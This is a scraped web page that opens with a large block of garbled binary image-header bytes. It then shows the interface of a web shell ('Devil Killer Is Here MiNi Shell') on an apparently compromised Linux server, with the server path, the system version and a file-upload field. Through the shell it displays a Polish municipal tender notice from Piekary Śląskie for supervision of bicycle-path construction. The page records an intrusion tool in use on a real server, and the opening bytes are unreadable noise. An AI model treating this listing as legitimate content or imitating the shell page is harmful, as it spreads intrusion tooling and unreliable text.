JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210922/0018897701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie kompleksowego nadzoru inwestorskiego dla zadania: Budowa zintegrowanego węzła przesiadkowego przy ul. Papieża Jana Pawła II wraz ze ścieżkami rowerowymi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Piekary Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255418</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 84</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323939379</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">323939379</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piekary.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie kompleksowego nadzoru inwestorskiego dla zadania: Budowa zintegrowanego węzła przesiadkowego przy ul. Papieża Jana Pawła II wraz ze ścieżkami rowerowymi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d27adda2-1b94-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00188977</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001004/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Pełnienie kompleksowego nadzoru inwestorskiego dla zadania: Budowa zintegrowanego węzła przesiadkowego przy ul. Papieża Jana Pawła II wraz ze ścieżkami rowerowymi.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Śląskiego na lata 2014-2020 Oś Priorytetowa IV „Efektywność energetyczna, odnawialne źródła energii i gospodarka niskoemisyjna” Działanie 4.5 „Niskoemisyjny transport miejski oraz efektywne oświetlenie” Poddziałanie 4.5.1 „Niskoemisyjny transport miejski oraz efektywne oświetlenie – ZIT” (WND-RPSL.04.05.01-24-09E2/16-005 pt.. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) poprzez Platformę przetargową<br/>pod adresem:<br/>https://josephine.proebiz.com/pl/ (zwanej dalej zamiennie Platformą przetargową), w wierszu<br/>oznaczonym tytułem oraz znakiem niniejszego postępowania lub<br/>2) pocztą elektroniczną na adres e-mail Zamawiającego: bzp@piekary.pl oraz adresy e mail<br/>Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie<br/>możliwy tylko poprzez adres(adresy) wskazany w formularzu ofertowym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://josephine.proebiz.com/pl/ oraz zaakceptować regulamin korzystania z Platformy przetargowej.<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej - pod adresem:<br/>https://josephine.proebiz.com/pl/<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.<br/>PROEBIZ s.r.o., Masarykovo náměstí 52/33, CZ - 702 00 Ostrava - Moravská Ostrava, C.9176, nr tel.<br/>+48 222 139 900, e-mail: houston@proebiz.com od poniedziałku do piątku (dni robocze) w godz. 8.00 –<br/>16.00.<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>Ogłoszenie nr 2021/BZP 00176498/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>oferty, zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego<br/>zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu<br/>udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U.<br/>z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1<br/>ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych<br/>skompresowanych (w tym oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w<br/>Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Powyższe oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym<br/>oferty) skompresowanych formatem .rar<br/>8. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego rozdziału SWZ,<br/>przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej,<br/>wskazanych przez Zamawiającego w niniejszej SWZ.<br/>9. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>10. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (dalej RODO):<br/>1. Administratorem Pani/Pana danych jest Prezydent Miasta w Piekarach Śląskich z siedzibą przy ul.<br/>Bytomskiej 84, 41-940 Piekary Śląskie, tel.32/3939411 (centrala), bip.piekary.pl , adres e-mail:<br/>um@piekary.pl.<br/>2. Wyznaczony został Inspektor ochrony danych, z którym można się skontaktować w sprawie ochrony<br/>swoich danych pod adresem – e-mail: dane.osobowe@piekary.pl. lub pisemnie na adres siedziby<br/>Administratora wskazany powyżej. Jakakolwiek zmiana osoby wyznaczonej na Inspektora ochrony<br/>danych nie będzie wpływała na wskazane sposoby kontaktu.<br/>3. Pani/Pana dane będą przetwarzane w celu prowadzenia procedury przetargowej, w wyniku której<br/>zostanie wybrany wykonawca, z którym zostanie zawarta umowa w sprawie zamówienia publicznego,<br/>zgodnie z art. 6 ust. 1 lit. c RODO, w związku z postanowieniami ustawy PZP z dnia 29 stycznia 2004.<br/>Ogłoszenie nr 2021/BZP 00176498/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>4. Z poszanowaniem poufnego charakteru Pani/Pana danych, w tym stosując mechanizmy<br/>minimalizujące liczbę przekazywanych danych oraz ograniczając możliwość przekazywania danych o<br/>charakterze wrażliwym Pani/Pana dane osobowe będą ujawniane podmiotom i osobom upoważnionym<br/>na podstawie przepisów prawa:<br/>- LTC spółka z o.o. z siedzibą przy ul. Pabianickiej 159/161, 93-490 Łódź, której powierzono dane w<br/>związku z asystą techniczną elektronicznego systemu obiegu dokumentów w Urzędzie Miasta Piekary<br/>Śląskie.<br/>- uczestnikom i wszystkim zainteresowanym prowadzonymi postępowaniami przetargowymi,<br/>- operatorowi pocztowemu lub kurierowi (w przypadku korespondencji papierowej)<br/>- ponadto w zakresie stanowiącym informację publiczną dane będą ujawniane każdemu<br/>zainteresowanemu taką informacją.<br/>5. Pani/Pana dane osobowe będą przechowywane jedynie w okresie niezbędnym do realizacji celu o<br/>którym mowa w ust. 3. Po zrealizowaniu tego celu dane osobowe będą przechowywane w celach<br/>archiwalnych przez okres 5 lat- dokumentacja zamówień publicznych, 10 lat – umowy w sprawie<br/>zamówienia publicznego, zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia<br/>18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz<br/>instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych. Okres przetwarzania może<br/>ulec zmianie ze względu na inne przepisy prawa.<br/>6. Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz prawo do żądania ich<br/>sprostowania w takim zakresie, w jakim wskazane dane są niezgodne ze stanem faktycznym,<br/>usunięcia, jeżeli dane nie są niezbędne do wywiązania się z obowiązku wynikającego z przepisu prawa<br/>lub w ramach sprawowania władzy publicznej oraz do ograniczenia przetwarzania. Ponadto ma<br/>Pani/Pan prawo wniesienia sprzeciwu wobec przetwarzania. W celu skorzystania z ww. należy<br/>skontaktować się z administratorem lub Inspektorem Ochrony Danych.<br/>7. Podanie danych jest wymogiem ustawowym. Niepodanie uniemożliwia wzięcie udziału w procedurze<br/>wyboru wykonawcy.<br/>8. Administrator danych osobowych, na mocy art.17 ust. 3 lit. b RODO, ma prawo odmówić usunięcia<br/>Pani/Pana danych osobowych.<br/>9. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego ds. ochrony<br/>danych osobowych – Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, iż przepisy<br/>RODO zostały naruszone;<br/>10. Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji<br/>ani profilowania, o którym mowa w art. 22.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271-38/IG/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Nadzór nad Trasą rowerową nr 3 odcinek A3 – od Ronda Kopalni „Andaluzja” do skrzyżowania ul. Prymasa St. Wyszyńskiego z ul. Czołgistów (rejon działki nr 984/8),<br/>Część 1 - przedmiotu zamówienia obejmuje w szczególności: <br/>•	wykonanie trasy rowerowej na odcinku A3 dla trasy rowerowej nr 3<br/>W ramach w/w trasy rowerowej należy wykonać:<br/>- roboty rozbiórkowe m.in. rozbiórkę krawężników 15x30 cm na długości ok. 505,00 mb, rozbiórkę obrzeży 8x30 cm na długości ok. 947,00 mb, frezowanie istniejącej nawierzchni bitumicznej na gł. min. do 4 cm na powierzchni ok. 134,00 m2 oraz rozebranie istniejącej nawierzchni z kostki betonowej o grubości 8 cm na powierzchni ok. 1397,00 m2, rozbiórkę istniejącego ogrodzenia na długości ok. 9,00 m;<br/>- ścieżkę rowerową/ciąg pieszo-rowerowy o nawierzchni z mieszanki mineralno-bitumicznej na łącznej powierzchni ok. 1460,00 m2;<br/>- chodniki z kostki brukowej betonowej o łącznej powierzchni ok. 1082,00 m2;<br/>- elementy krawędziowe tj. ułożenie obrzeży betonowych w ilości ok. 1483,00 mb oraz krawężników betonowych w ilości ok. 468,00 mb;<br/>-	regulacja / wymiana / demontaż istniejących urządzeń;<br/>-	przebudowa i zabezpieczenie sieci elektroenergetycznych; <br/>-	przebudowę oświetlenia ulicznego;<br/>-	wykonanie nasadzeń zastępczych;<br/>-	przestawienie wiaty przystankowej, tablicy z rozkładem jazdy i słupa reklamowego;<br/>- odtworzenie istniejącego ogrodzenia na długości ok. 9,00 m;<br/>-	wykonanie docelowej organizacji ruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- zakres zamówienia: reprezentowanie Inwestora (Zamawiającego) na budowie przez sprawowanie kontroli zgodności jej realizacji z projektami i zgłoszeniami/pozwoleniami na budowę, przepisami oraz zasadami wiedzy technicznej, sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowania i udziału w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania, potwierdzenie faktycznie wykonanych robót oraz usuniętych wad, a także kontrolowanie rozliczeń budowy,<br/><br/>- warunki udzielenia zamówienia: sytuacje losowe, usunięcie przeszkód formalno-prawnych, wymogi organów podmiotów trzecich, zapewnienie funkcjonalności oraz zapewnienie bezpieczeństwa użytkowników, konieczność zwiększenia zakresu usług,<br/><br/>- szacunkowa wartość tego zamówienia: 8 018,02 zł netto</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">według przyjętych kryteriów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje zawodowe i doswiadczenie osoby wyznaczonej do realizacji zamówienia mającej znaczny wpływ na jakość wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Nadzór nad Trasą rowerową nr 23 odcinek A2 – od połączenia z Trasą nr 1 (ul. Olimpijska) do ul. Bytomskiej. <br/>Część 2 - przedmiotu zamówienia obejmuje w szczególności: <br/>•	wykonanie trasy rowerowej na odcinku A2 dla trasy rowerowej nr 23<br/>W ramach w/w trasy rowerowej należy wykonać:<br/>- ciąg pieszo-rowerowy o nawierzchni z mieszanki mineralno-bitumicznej na łącznej powierzchni ok. 1054,00 m2;<br/>- elementy krawędziowe tj. ułożenie obrzeży betonowych w ilości ok. 850,00 mb;<br/>- przekrycia rowu poprzez ułożenie rury typu/klasy z PEHD o średnicy 400 mm i długości ok. 3,00 mb oraz montaż gotowych ścian oporowych;<br/>- regulację wysokościową studni kanalizacji sanitarnej i deszczowej;<br/>-	przebudowa i zabezpieczenie sieci elektroenergetycznych;<br/>-	wykonanie wycinki drzew i krzewów;<br/>-	wykonanie nasadzeń zastępczych;<br/>-	wykonanie docelowej organizacji ruchu.<br/><br/>Roboty budowlane, nad którymi będzie pełniony nadzór inwestorski w ramach realizacji niniejszego przedmiotu zamówienia (i jego poszczególnych części), będą polegały na wykonaniu pełnego zakresu robót zgodnie z projektem budowlanym wraz z załącznikami, projektem wykonawczym wraz z załącznikami, STWiORB, przedmiarem robót, umową na roboty budowlane oraz pozostałymi dokumentami przetargowymi dla nadzorowanego zadania inwestycyjnego oraz warunkami dofinansowania. Wynik robót ma być kompletny, zgodny z przeznaczeniem i przepisami prawa, normami oraz zasadami sztuki budowlanej, gotowy do użytkowania wraz z dokonaniem wszelkich formalności niezbędnych do użytkowania obiektu/ów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Część 2 <br/><br/>- zakres zamówienia: reprezentowanie Inwestora (Zamawiającego) na budowie przez sprawowanie kontroli zgodności jej realizacji z projektami i zgłoszeniami/pozwoleniami na budowę, przepisami oraz zasadami wiedzy technicznej, sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowania i udziału w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania, potwierdzenie faktycznie wykonanych robót oraz usuniętych wad, a także kontrolowanie rozliczeń budowy,<br/><br/>- warunki udzielenia zamówienia: sytuacje losowe, usunięcie przeszkód formalno-prawnych, wymogi organów podmiotów 